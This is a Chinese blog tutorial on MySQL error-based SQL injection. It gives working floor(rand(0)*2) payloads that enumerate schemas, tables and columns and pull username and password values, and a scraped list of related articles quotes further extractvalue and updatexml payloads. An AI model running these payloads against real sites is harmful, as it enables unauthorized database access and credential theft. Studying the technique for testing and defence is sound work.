SQL注入之报错型注入

最新推荐文章于 2024-07-23 21:39:06 发布
最新推荐文章于 2024-07-23 21:39:06 发布
阅读量5k 收藏 8
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liangdongjuan/article/details/78406395
版权

介绍

联合查询可以把我们想要的数据展示在网页上,替代网页上原有的数据内容;而今天我们要讨论的是,网页上没有展示查询结果的地方,也就是说select语句执行结果不能出现在网页上,我们需要让执行结果出现在其它地方,出现在哪呢?出现在报错语句中。
数据库返回到页面上的唯一信息就是,mysql错误。因此,我们需要以一种方式处理我们的查询,以便通过错误获取数据库信息。查询条件必须是正确的,能被后端数据库解释执行,且需产生一个逻辑错误,让数据库信息伴随错误字符串返回。

前提

知识点:

  • 子查询
  • information_schema
  • 衍生表

注释

mysql的注释有4 种:

  1. ‘#’:# 开头到行尾的都为注释,只能注释一行。

  2. ‘– ‘(2个减号 一个空格):-开头到行尾都为注释 , 只能注释一行。

  3. ‘/xxx /’:可以注释多行,但是一定要闭合,不然出错。

  4. ‘/!xxx/’:可以跨行注释,但是一定要闭合,不然出错。

流程

公式

and (select 1 from (select count(*),concat((select(select(报错语句))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

数据库

and (select 1 from (select count(*),concat((select(select(select group_concat(schema_name) from information_schema.schemata))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

and (select 1 from (select count(*),concat((select(select(select group_concat(table_name) from information_schema.tables where table_schema=database()))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

字段

and (select 1 from (select count(*),concat((select(select(select group_concat(column_name) from information_schema.columns where table_name=十六进制))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

数据

and (select 1 from (select count(*),concat((select(select(select distinct concat(username,password) from xxx limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

and (select 1 from (select count(*),concat((select(select(select distinct concat(‘~’,table_schema) from information_schema.tables limit 7,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

http://blog.csdn.net/nixawk/article/details/27804385
https://www.2cto.com/article/201604/498394.html
http://www.jianshu.com/p/8c2343705100
http://www.cnblogs.com/wocalieshenmegui/p/5917967.html

梁顿
关注
专栏目录
SQL注入报错注入
m0_56578216的博客
08-23 1176
table_name=0x636d735f7573657273是cms_users表名转16进制后的结果,如果直接用表名’cms_users’,会导致表名被cms**转义并报错,**所以需要避免单引号的使用。在注入点的判断过程中,发现数据库中SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。limit 0,1:用来限定取第0行的一行记录,由于有8个表,也就是有8行数据,多取会报错。limit 1,1:用来限定取第1行的一行记录,由于有3行数据,多取会报错
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 5110
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL注入报错注入
热门推荐
4ct10n
10-07 1万+
做了一些报错注入的题目,总结了一下。原理很简单,只要理解了就能熟练的应用。大体上分了两类出来,一个是利用xml报错,另一个是正常数据库报错。两类的原理不同。
SQL注入报错注入
Forget_liu的博客
06-10 1706
第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但是这个运算的结果可能在虚拟表中已经存在了,那么这时的插入必然导致主键的重复,进而引发错误。很显然rand(0)是伪随机的,有规律可循,这也是我们采用rand(0)进行报错注入的原因,rand(0)是稳定的,这样每次注入都会报错,而rand()则需要碰运气了,我们测试结果如下。//以下案例代码是抄的。
几种常见的报错注入详解
最新发布
m0_74312676的博客
07-23 815
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL注入---报错注入
zhoutong2323的博客
04-04 1022
SQL注入报错攻击中,攻击者通过在用户输入的位置注入恶意的SQL代码,使应用程序拼接出错误的SQL语句。当数据库执行错误的SQL语句时,会返回错误信息,这些错误信息可能包含数据库的具体错误信息、相关的数据和表结构等敏感信息。攻击者通过分析这些错误信息来获取相关的数据或者进一步攻击数据库。案例分析:上述sql注入中认为将正确的sql语句database() 改为错误的sql语句 datadase()数据库回显内容为:FUNCTION security.datadase does not exist。
sql注入报错注入
2302_79119987的博客
04-19 1516
实行注入的地方。
SQL注入报错注入
qq_68163788的博客
01-27 2154
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入报错盲注详解
DM766924的博客
09-15 1820
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入
SQL注入报错注入法(基于Metasploitable2-Linux)
qq_43578780的博客
11-29 424
1、使用报错注入的条件 1):在数据查询时,网页没有查询输出的结果;但当输入错误时,网页上有输入错误的提示(其实就是在信息与数据库进行交互后,输入错误的信息时,网页会显示出来。) 2):其在网页上的具体情况,和解决的办法。 由于在输入正确时,其显示的结果不变。 故只能尝试在输入错误时,其显示会进行提示这一点进行交互。 方法:在输入正确时,没有数据的显示,也就是说即使构造语句成功我们也没有办法...
33-33.渗透测试渗透测试之SQL注入基于报错注入(下)
05-10
渗透测试渗透测试之SQL注入基于报错注入(下)
SQL报错注入的12个函数及sql注入语句
weixin_30852451的博客
07-09 1274
转来的 侵删 1、通过floor报错,注入语句如下: andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); 2、通过ExtractValue报错,注入语句如下: andextractva...
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 119
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
Sql注入-报错注入
WolvenSec的博客
06-06 1229
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
sql注入报错注入
m0_59855041的博客
06-12 1225
(4)group_concat():GROUP_CONCAT(xxx):是将分组中括号里对应的字符串进行连接.如果分组中括号里的参数xxx有多行,那么就会将这多行的字符串连接,每个字符串之间会有特定的符号进行分隔。注:利用extractvalue()对数据进行一个排序,指定第一个参数为null,可以换成1、#或者其他符号,使其报错,并执行第二个参数语句。(与extractvalue()基本一样,这是updatexml(1,concat(),3)多了一个3的参数。substring(abc,2,2)为bc。
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 952
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
sql 报错注入
travelnight的博客
03-15 4110
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
SQL报错注入
qq_36760683的博客
05-07 1023
SQL报错注入:原文链接: http://wyb0.com/posts/injection-of-error-based/============================================================================一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,它的特点是注入速度快,但是语句较复...
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类不匹配,导致SQL语句...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值